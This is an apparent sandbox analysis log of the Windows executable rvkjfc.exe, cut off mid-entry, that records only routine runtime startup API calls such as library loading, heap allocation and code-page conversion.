# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 04.03.2020 17:05:12.929 Process: id = "1" image_name = "rvkjfc.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rvkjfc.exe" page_root = "0x4c078000" os_pid = "0x6dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x6c0 [0023.429] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f818 | out: lpSystemTimeAsFileTime=0x26f818*(dwLowDateTime=0x1dd0f150, dwHighDateTime=0x1d5f247)) [0023.429] GetCurrentThreadId () returned 0x6c0 [0023.429] GetCurrentProcessId () returned 0x6dc [0023.429] QueryPerformanceCounter (in: lpPerformanceCount=0x26f810 | out: lpPerformanceCount=0x26f810*=14431425014) returned 1 [0023.454] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0023.455] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.455] GetLastError () returned 0x57 [0023.455] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x75650000 [0023.470] GetProcAddress (hModule=0x75650000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0023.471] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.471] GetLastError () returned 0x57 [0023.471] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0023.475] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.475] GetLastError () returned 0x57 [0023.475] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0023.475] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0023.476] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0023.477] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.477] GetLastError () returned 0x57 [0023.477] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0023.477] GetProcAddress (hModule=0x77710000, lpProcName="EventRegister") returned 0x77c7f6ba [0023.477] EtwEventRegister () returned 0x0 [0023.477] GetProcAddress (hModule=0x77710000, lpProcName="EventSetInformation") returned 0x0 [0023.478] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.478] GetLastError () returned 0x57 [0023.478] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x75650000 [0023.478] GetProcAddress (hModule=0x75650000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0023.479] GetProcessHeap () returned 0x410000 [0023.479] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.479] GetLastError () returned 0x57 [0023.479] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0023.496] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.496] GetLastError () returned 0x57 [0023.496] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0023.496] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0023.496] GetLastError () returned 0x57 [0023.496] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0023.496] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x364) returned 0x42daf0 [0023.496] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0023.497] SetLastError (dwErrCode=0x57) [0023.497] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xc00) returned 0x42de60 [0023.508] GetStartupInfoW (in: lpStartupInfo=0x26f740 | out: lpStartupInfo=0x26f740*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1219f30, hStdOutput=0x412824be, hStdError=0xfffffffe)) [0023.508] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0023.508] GetFileType (hFile=0x3) returned 0x2 [0023.509] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0023.509] GetFileType (hFile=0x7) returned 0x2 [0023.509] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0023.509] GetFileType (hFile=0xb) returned 0x2 [0023.509] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe\" " [0023.509] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe\" " [0023.509] GetLastError () returned 0x57 [0023.509] SetLastError (dwErrCode=0x57) [0023.509] GetLastError () returned 0x57 [0023.509] SetLastError (dwErrCode=0x57) [0023.510] GetACP () returned 0x4e4 [0023.510] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x220) returned 0x42f268 [0023.510] IsValidCodePage (CodePage=0x4e4) returned 1 [0023.510] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26f770 | out: lpCPInfo=0x26f770) returned 1 [0023.510] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26f038 | out: lpCPInfo=0x26f038) returned 1 [0023.510] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f64c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0023.511] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f64c, cbMultiByte=256, lpWideCharStr=0x26edd8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ娬ĢĀ") returned 256 [0023.511] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ娬ĢĀ", cchSrc=256, lpCharType=0x26f04c | out: lpCharType=0x26f04c) returned 1 [0023.512] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f64c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0023.512] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f64c, cbMultiByte=256, lpWideCharStr=0x26ed88, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ纵ĢĀ") returned 256 [0023.512] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.512] GetLastError () returned 0x57 [0023.512] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0023.538] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0023.538] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ纵ĢĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0023.538] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ纵ĢĀ", cchSrc=256, lpDestStr=0x26eb78, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0023.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x26f54c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8e\x1d+@\x88÷&", lpUsedDefaultChar=0x0) returned 256 [0023.538] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f64c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0023.538] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f64c, cbMultiByte=256, lpWideCharStr=0x26eda8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0023.538] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0023.538] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x26eb98, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0023.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x26f44c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8e\x1d+@\x88÷&", lpUsedDefaultChar=0x0) returned 256 [0023.539] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x42d080 [0023.540] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12629c0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rvkjfc.exe")) returned 0x30 [0023.540] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x39) returned 0x424cd8 [0023.540] RtlInitializeSListHead (in: ListHead=0x1262170 | out: ListHead=0x1262170) [0023.540] GetLastError () returned 0x0 [0023.540] SetLastError (dwErrCode=0x0) [0023.540] GetEnvironmentStringsW () returned 0x42f490* [0023.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0023.540] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x565) returned 0x42ff68 [0023.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x42ff68, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0023.549] FreeEnvironmentStringsW (penv=0x42f490) returned 1 [0023.549] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x98) returned 0x42d108 [0023.549] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1f) returned 0x42eda0 [0023.549] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x36) returned 0x41f278 [0023.549] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x37) returned 0x42d1a8 [0023.549] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x3c) returned 0x424d20 [0023.549] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x31) returned 0x42d1e8 [0023.549] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x17) returned 0x42d228 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x24) returned 0x428d28 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x42d248 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xd) returned 0x4216c8 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x25) returned 0x428d58 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x39) returned 0x424d68 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x42f490 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x17) returned 0x42f4b0 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe) returned 0x4216e0 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x69) returned 0x42f4d0 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x3e) returned 0x424db0 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1b) returned 0x42edc8 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1d) returned 0x42edf0 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x48) returned 0x4240b0 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x12) returned 0x42f548 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x42f568 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1b) returned 0x42ee18 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x24) returned 0x428d88 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x29) returned 0x429338 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1e) returned 0x42ee40 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x41) returned 0x424100 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x17) returned 0x42f588 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xf) returned 0x4216f8 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x16) returned 0x42f5a8 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x2a) returned 0x429370 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x29) returned 0x4293a8 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x15) returned 0x42f5c8 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1e) returned 0x42ee68 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x2a) returned 0x4293e0 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x12) returned 